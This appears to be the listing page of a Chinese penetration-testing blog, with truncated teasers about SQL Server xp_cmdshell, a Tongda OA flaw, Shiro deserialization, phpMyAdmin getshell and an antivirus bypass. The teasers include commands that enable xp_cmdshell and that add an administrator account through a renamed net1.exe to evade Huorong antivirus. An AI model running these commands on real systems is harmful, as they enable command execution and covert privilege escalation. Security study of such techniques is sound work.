1.开启和关毕xp_cmdshellEXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;R...
Adminxe
5年前 (2020-03-19) 9138℃ 0评论
10喜欢
0x00 前言
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
0x01 漏洞简介及影响版本
3月13日,通达OA在官方论坛发布通...
Adminxe
5年前 (2020-03-18) 6979℃ 0评论
8喜欢
0X00 前言
@Adminxe 这是主要是利用shiro反序列化漏洞的一次渗透利用,可能有些地方不是很详细,主要还是分享过程
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。未经授权,请勿随便转载!
0x01 渗透过程
前期...
Adminxe
5年前 (2020-03-14) 7493℃ 1评论
19喜欢
0x00 前言
简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细写出利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。
0x01 getshe...
Adminxe
5年前 (2020-03-10) 9947℃ 0评论
12喜欢
Bypass 某绒拦截添加用户:
copy c:\windows\system32\net1.exe aaa.txt
aaa.txt user mumu 123.com /add
aaa.txt localgroup Administrators mumu ...
Adminxe
5年前 (2020-03-10) 704℃ 0评论
0喜欢
